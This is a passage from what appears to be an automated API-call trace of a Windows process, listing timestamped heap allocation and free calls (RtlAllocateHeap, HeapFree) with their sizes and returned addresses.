hHeap=0x12c0000) returned 1 [0117.440] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dba70 | out: hHeap=0x12c0000) returned 1 [0117.440] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc508 | out: hHeap=0x12c0000) returned 1 [0117.440] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12dbff8 [0117.440] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc4c0 [0117.440] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc4a8 [0117.440] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dc508 [0117.440] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12dba70 [0117.440] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc508 | out: hHeap=0x12c0000) returned 1 [0117.440] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dba70 | out: hHeap=0x12c0000) returned 1 [0117.440] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc4a8 | out: hHeap=0x12c0000) returned 1 [0117.440] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc520 [0117.440] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x26) returned 0x12c7788 [0117.441] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dc508 [0117.441] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x12ccd90 [0117.441] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12db950 [0117.441] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12c7788 | out: hHeap=0x12c0000) returned 1 [0117.441] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc460 [0117.441] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dc490 [0117.441] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc508 | out: hHeap=0x12c0000) returned 1 [0117.441] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc4a8 [0117.441] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc508 [0117.441] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc250 [0117.441] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12dc070 [0117.441] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc208 [0117.441] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc328 [0117.441] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc448 [0117.441] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dc3a0 [0117.441] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc418 [0117.441] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc3d0 [0117.442] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc160 [0117.442] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc4c0 | out: hHeap=0x12c0000) returned 1 [0117.442] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc520 | out: hHeap=0x12c0000) returned 1 [0117.442] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc490 | out: hHeap=0x12c0000) returned 1 [0117.442] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc460 | out: hHeap=0x12c0000) returned 1 [0117.442] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc4a8 | out: hHeap=0x12c0000) returned 1 [0117.442] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc508 | out: hHeap=0x12c0000) returned 1 [0117.442] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc250 | out: hHeap=0x12c0000) returned 1 [0117.442] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xe) returned 0x12dc430 [0117.442] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dc3b8 [0117.442] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12dba70 [0117.442] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc3b8 | out: hHeap=0x12c0000) returned 1 [0117.442] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dba70 | out: hHeap=0x12c0000) returned 1 [0117.443] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc430 | out: hHeap=0x12c0000) returned 1 [0117.443] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc190 [0117.443] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc220 [0117.443] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dc268 [0117.443] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12dbad0 [0117.443] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc268 | out: hHeap=0x12c0000) returned 1 [0117.443] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dbad0 | out: hHeap=0x12c0000) returned 1 [0117.443] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc220 | out: hHeap=0x12c0000) returned 1 [0117.443] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc400 [0117.443] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x26) returned 0x12c7788 [0117.443] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dc220 [0117.444] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x12ccc08 [0117.444] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12dbb00 [0117.444] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12c7788 | out: hHeap=0x12c0000) returned 1 [0117.444] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc238 [0117.444] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dc388 [0117.444] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc220 | out: hHeap=0x12c0000) returned 1 [0117.444] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc1a8 [0117.444] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc358 [0117.444] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc1c0 [0117.444] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12dc020 [0117.444] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc430 [0117.444] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc178 [0117.444] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc3e8 [0117.444] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dc1d8 [0117.444] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc1f0 [0117.444] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc220 [0117.444] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc250 [0117.444] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc190 | out: hHeap=0x12c0000) returned 1 [0117.444] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc400 | out: hHeap=0x12c0000) returned 1 [0117.445] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc388 | out: hHeap=0x12c0000) returned 1 [0117.445] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc238 | out: hHeap=0x12c0000) returned 1 [0117.445] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc1a8 | out: hHeap=0x12c0000) returned 1 [0117.445] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc358 | out: hHeap=0x12c0000) returned 1 [0117.445] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc1c0 | out: hHeap=0x12c0000) returned 1 [0117.445] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xe) returned 0x12dc3b8 [0117.445] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dc400 [0117.445] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12db970 [0117.445] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc400 | out: hHeap=0x12c0000) returned 1 [0117.445] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12db970 | out: hHeap=0x12c0000) returned 1 [0117.446] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc3b8 | out: hHeap=0x12c0000) returned 1 [0117.446] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc400 [0117.446] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc310 [0117.446] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dc3b8 [0117.446] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12dbb10 [0117.446] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc3b8 | out: hHeap=0x12c0000) returned 1 [0117.446] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dbb10 | out: hHeap=0x12c0000) returned 1 [0117.446] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc310 | out: hHeap=0x12c0000) returned 1 [0117.446] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc358 [0117.446] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x22) returned 0x12c7788 [0117.446] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dc238 [0117.446] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x12cca10 [0117.446] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12dba70 [0117.446] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12c7788 | out: hHeap=0x12c0000) returned 1 [0117.446] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc190 [0117.446] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dc1a8 [0117.447] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc238 | out: hHeap=0x12c0000) returned 1 [0117.447] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc1c0 [0117.447] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc340 [0117.447] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc238 [0117.447] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12dbda0 [0117.447] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc268 [0117.447] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc3b8 [0117.447] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc280 [0117.447] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dc310 [0117.447] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc298 [0117.447] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc2b0 [0117.447] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc2c8 [0117.447] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc400 | out: hHeap=0x12c0000) returned 1 [0117.447] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc358 | out: hHeap=0x12c0000) returned 1 [0117.447] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc1a8 | out: hHeap=0x12c0000) returned 1 [0117.447] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc190 | out: hHeap=0x12c0000) returned 1 [0117.447] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc1c0 | out: hHeap=0x12c0000) returned 1 [0117.447] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc340 | out: hHeap=0x12c0000) returned 1 [0117.448] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc238 | out: hHeap=0x12c0000) returned 1 [0117.448] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xe) returned 0x12dc400 [0117.448] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dc2e0 [0117.448] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12db970 [0117.448] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc2e0 | out: hHeap=0x12c0000) returned 1 [0117.448] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12db970 | out: hHeap=0x12c0000) returned 1 [0117.448] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc400 | out: hHeap=0x12c0000) returned 1 [0117.448] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc340 [0117.448] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc358 [0117.448] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dc370 [0117.448] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12dbb20 [0117.448] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc370 | out: hHeap=0x12c0000) returned 1 [0117.448] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dbb20 | out: hHeap=0x12c0000) returned 1 [0117.448] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc358 | out: hHeap=0x12c0000) returned 1 [0117.448] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc190 [0117.448] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12dc0c0 [0117.449] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dc2e0 [0117.449] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12dbdc8 [0117.449] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12dba80 [0117.449] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc0c0 | out: hHeap=0x12c0000) returned 1 [0117.449] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc358 [0117.449] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dc1c0 [0117.449] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc2e0 | out: hHeap=0x12c0000) returned 1 [0117.449] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc2e0 [0117.449] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc370 [0117.449] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc2f8 [0117.449] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12dc0e8 [0117.449] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc388 [0117.449] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc400 [0117.450] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc1a8 [0117.450] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dc238 [0117.450] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc490 [0117.451] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc4a8 [0117.451] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc508 [0117.451] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc340 | out: hHeap=0x12c0000) returned 1 [0117.451] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc190 | out: hHeap=0x12c0000) returned 1 [0117.451] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc1c0 | out: hHeap=0x12c0000) returned 1 [0117.451] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc358 | out: hHeap=0x12c0000) returned 1 [0117.451] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc2e0 | out: hHeap=0x12c0000) returned 1 [0117.451] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc370 | out: hHeap=0x12c0000) returned 1 [0117.451] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc2f8 | out: hHeap=0x12c0000) returned 1 [0117.451] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xe) returned 0x12dc2e0 [0117.451] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dc190 [0117.451] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12dbaa0 [0117.451] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc190 | out: hHeap=0x12c0000) returned 1 [0117.451] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dbaa0 | out: hHeap=0x12c0000) returned 1 [0117.451] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc2e0 | out: hHeap=0x12c0000) returned 1 [0117.451] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc190 [0117.452] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc370 [0117.452] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dc340 [0117.452] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12db970 [0117.452] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc340 | out: hHeap=0x12c0000) returned 1 [0117.452] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12db970 | out: hHeap=0x12c0000) returned 1 [0117.452] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc370 | out: hHeap=0x12c0000) returned 1 [0117.452] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc1c0 [0117.452] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1e) returned 0x12dbee0 [0117.452] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dc2e0 [0117.452] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12dc048 [0117.452] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12dbaa0 [0117.452] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dbee0 | out: hHeap=0x12c0000) returned 1 [0117.452] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc358 [0117.452] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dc2f8 [0117.452] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc2e0 | out: hHeap=0x12c0000) returned 1 [0117.453] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc2e0 [0117.453] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc340 [0117.453] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc370 [0117.453] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12dbeb8 [0117.453] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc520 [0117.453] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc460 [0117.453] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc4c0 [0117.453] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12d7c00 [0117.453] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12d7c30 [0117.453] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc968 [0117.454] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc8c0 [0117.454] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc190 | out: hHeap=0x12c0000) returned 1 [0117.454] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc1c0 | out: hHeap=0x12c0000) returned 1 [0117.454] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc2f8 | out: hHeap=0x12c0000) returned 1 [0117.454] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc358 | out: hHeap=0x12c0000) returned 1 [0117.454] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc2e0 | out: hHeap=0x12c0000) returned 1 [0117.454] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc340 | out: hHeap=0x12c0000) returned 1 [0117.454] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc370 | out: hHeap=0x12c0000) returned 1 [0117.455] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xe) returned 0x12dcab8 [0117.455] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dca10 [0117.455] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12dbad0 [0117.455] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dca10 | out: hHeap=0x12c0000) returned 1 [0117.455] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dbad0 | out: hHeap=0x12c0000) returned 1 [0117.455] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dcab8 | out: hHeap=0x12c0000) returned 1 [0117.455] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc878 [0117.455] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dca10 [0117.455] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dca88 [0117.455] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12dbad0 [0117.455] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dca88 | out: hHeap=0x12c0000) returned 1 [0117.455] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dbad0 | out: hHeap=0x12c0000) returned 1 [0117.456] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dca10 | out: hHeap=0x12c0000) returned 1 [0117.456] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dcaa0 [0117.456] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12dc098 [0117.456] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dc890 [0117.456] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12dbe90 [0117.456] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12dbad0 [0117.456] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc098 | out: hHeap=0x12c0000) returned 1 [0117.456] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc8d8 [0117.456] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dc8a8 [0117.456] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc890 | out: hHeap=0x12c0000) returned 1 [0117.456] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc9b0 [0117.456] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc980 [0117.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dca58 [0117.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12dc098 [0117.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc9c8 [0117.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc8f0 [0117.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dca10 [0117.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dca70 [0117.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dcb18 [0117.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dca28 [0117.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dcab8 [0117.576] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc878 | out: hHeap=0x12c0000) returned 1 [0117.576] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dcaa0 | out: hHeap=0x12c0000) returned 1 [0117.576] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc8a8 | out: hHeap=0x12c0000) returned 1 [0117.576] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc8d8 | out: hHeap=0x12c0000) returned 1 [0117.576] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc9b0 | out: hHeap=0x12c0000) returned 1 [0117.576] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc980 | out: hHeap=0x12c0000) returned 1 [0117.576] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dca58 | out: hHeap=0x12c0000) returned 1 [0117.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xe) returned 0x12dc9e0 [0117.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dc980 [0117.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12db970 [0117.576] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc980 | out: hHeap=0x12c0000) returned 1 [0117.576] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12db970 | out: hHeap=0x12c0000) returned 1 [0117.576] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc9e0 | out: hHeap=0x12c0000) returned 1 [0117.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dcae8 [0117.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 